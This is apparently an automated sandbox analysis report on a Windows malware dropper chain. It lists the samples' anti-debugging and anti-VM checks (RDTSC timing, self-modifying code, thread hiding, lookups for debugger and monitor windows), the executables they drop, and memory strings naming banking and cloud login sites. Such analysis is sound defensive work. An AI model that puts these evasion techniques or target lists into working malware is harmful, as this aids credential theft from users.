                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D60773 second address: 4D607AA instructions: 0x00000000 rdtsc 0x00000002 mov si, 3559h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, 1FC8CE15h 0x0000000d popad 0x0000000e pop ebx 0x0000000f jmp 00007FD3A4D6CBA0h 0x00000014 mov esp, ebp 0x00000016 jmp 00007FD3A4D6CBA0h 0x0000001b pop ebp 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 pop ebx 0x00000021 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D60033 second address: 4D6004F instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007FD3A47FEE8Ch 0x0000000c popad 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D6004F second address: 4D6006C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D6006C second address: 4D60072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D60072 second address: 4D60076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D60076 second address: 4D600D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a call 00007FD3A47FEE92h 0x0000000f movzx esi, di 0x00000012 pop ebx 0x00000013 jmp 00007FD3A47FEE8Ch 0x00000018 popad 0x00000019 mov dword ptr [esp], ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FD3A47FEE8Dh 0x00000025 xor esi, 029C16C6h 0x0000002b jmp 00007FD3A47FEE91h 0x00000030 popfd 0x00000031 push esi 0x00000032 pop edi 0x00000033 popad 0x00000034 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D600D2 second address: 4D60117 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD3A4D6CBA3h 0x00000009 or ah, FFFFFFFEh 0x0000000c jmp 00007FD3A4D6CBA9h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push edx 0x0000001c pop ecx 0x0000001d mov edi, 368184F8h 0x00000022 popad 0x00000023 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D60117 second address: 4D601B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 pushfd 0x00000007 jmp 00007FD3A47FEE99h 0x0000000c jmp 00007FD3A47FEE8Bh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FD3A47FEE8Fh 0x0000001d sub ch, 0000001Eh 0x00000020 jmp 00007FD3A47FEE99h 0x00000025 popfd 0x00000026 mov cx, 1BE7h 0x0000002a popad 0x0000002b xchg eax, esi 0x0000002c pushad 0x0000002d mov eax, 1DC9A0DFh 0x00000032 pushfd 0x00000033 jmp 00007FD3A47FEE94h 0x00000038 or si, 4348h 0x0000003d jmp 00007FD3A47FEE8Bh 0x00000042 popfd 0x00000043 popad 0x00000044 mov esi, dword ptr [ebp+08h] 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D601B1 second address: 4D601B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Tries to evade debugger and weak emulator (self modifying code)
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSpecial instruction interceptor: First address: 502905 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSpecial instruction interceptor: First address: 6B1E90 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSpecial instruction interceptor: First address: 6B2206 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSpecial instruction interceptor: First address: 50290B instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSpecial instruction interceptor: First address: 7443D7 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 782905 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 931E90 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 932206 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 78290B instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 9C43D7 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSpecial instruction interceptor: First address: 9E5ACD instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSpecial instruction interceptor: First address: B9DB1D instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeMemory allocated: 3010000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeMemory allocated: 3200000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeMemory allocated: 5200000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeCode function: 2_2_04D90201 rdtsc 2_2_04D90201
                              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1040Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1067Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1514Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1233Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1068Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeWindow / User API: threadDelayed 468
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\packed[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\amnew[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10121660101\amnew.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10122730101\bncn6rv.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\T0QdO0l[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10115790101\T0QdO0l.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10123540101\packed.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hanJump to dropped file
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\3E11p.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\bncn6rv[1].exeJump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uvwnwebboksgJump to dropped file
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2475
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2577
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeAPI coverage: 0.9 %
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe TID: 5296Thread sleep time: -210000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe TID: 5296Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6712Thread sleep count: 1040 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6712Thread sleep time: -2081040s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6696Thread sleep count: 1067 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6696Thread sleep time: -2135067s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 2204Thread sleep time: -32000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6140Thread sleep count: 1514 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6140Thread sleep time: -3029514s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5732Thread sleep count: 206 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5732Thread sleep time: -6180000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1476Thread sleep count: 1233 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1476Thread sleep time: -2467233s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6720Thread sleep count: 1068 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6720Thread sleep time: -2137068s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe TID: 2112Thread sleep time: -43992s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe TID: 5008Thread sleep time: -30000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe TID: 4412Thread sleep time: -120000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCode function: 0_2_00FA2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00FA2390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeCode function: 1_2_00922390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00922390
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D6120D0 _Open_dir,FindFirstFileExW,__Read_dir,FindClose,17_2_6D6120D0
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCode function: 0_2_00FA5467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00FA5467
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeFile opened: C:\Users\user~1\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeFile opened: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeFile opened: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\2R0700.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
                              Source: rapes.exe, rapes.exe, 00000004.00000002.987189840.0000000000915000.00000040.00000001.01000000.00000009.sdmp, 2R0700.exe, 00000005.00000002.1210356284.0000000000B74000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                              Source: SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                              Source: SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                              Source: 2R0700.exe, 2R0700.exe, 00000005.00000002.1209556432.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1097981161.000000000069D000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1209197653.0000000000661000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1127856691.000000000069D000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000002.1209718066.000000000069D000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208651372.000000000069D000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1209017562.000000000069D000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.996393122.000000000069D000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208651372.000000000065C000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1098466251.000000000069D000.00000004.00000020.00020000.00000000.sdmp, pwHxMTy.exe, 0000002E.00000002.2024766595.0000000001267000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                              Source: SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                              Source: SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                              Source: 2R0700.exe, 00000005.00000003.1028692054.00000000054B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                              Source: SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                              Source: 1E08u3.exe, 00000002.00000003.914010343.00000000011AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}I
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                              Source: pwHxMTy.exe, 0000002E.00000002.2024766595.0000000001267000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                              Source: 1E08u3.exe, 00000002.00000002.944674073.0000000000695000.00000040.00000001.01000000.00000005.sdmp, rapes.exe, 00000003.00000002.982468031.0000000000915000.00000040.00000001.01000000.00000009.sdmp, rapes.exe, 00000004.00000002.987189840.0000000000915000.00000040.00000001.01000000.00000009.sdmp, 2R0700.exe, 00000005.00000002.1210356284.0000000000B74000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSystem information queried: ModuleInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeProcess information queried: ProcessInformationJump to behavior

                              Anti Debugging

                              barindex
                              Hides threads from debuggers
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebuggerJump to behavior
                              Tries to detect sandboxes and other dynamic analysis tools (window names)
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: gbdyllo
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: procmon_window_class
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: ollydbg
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: NTICE
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: SICE
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: SIWVID
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
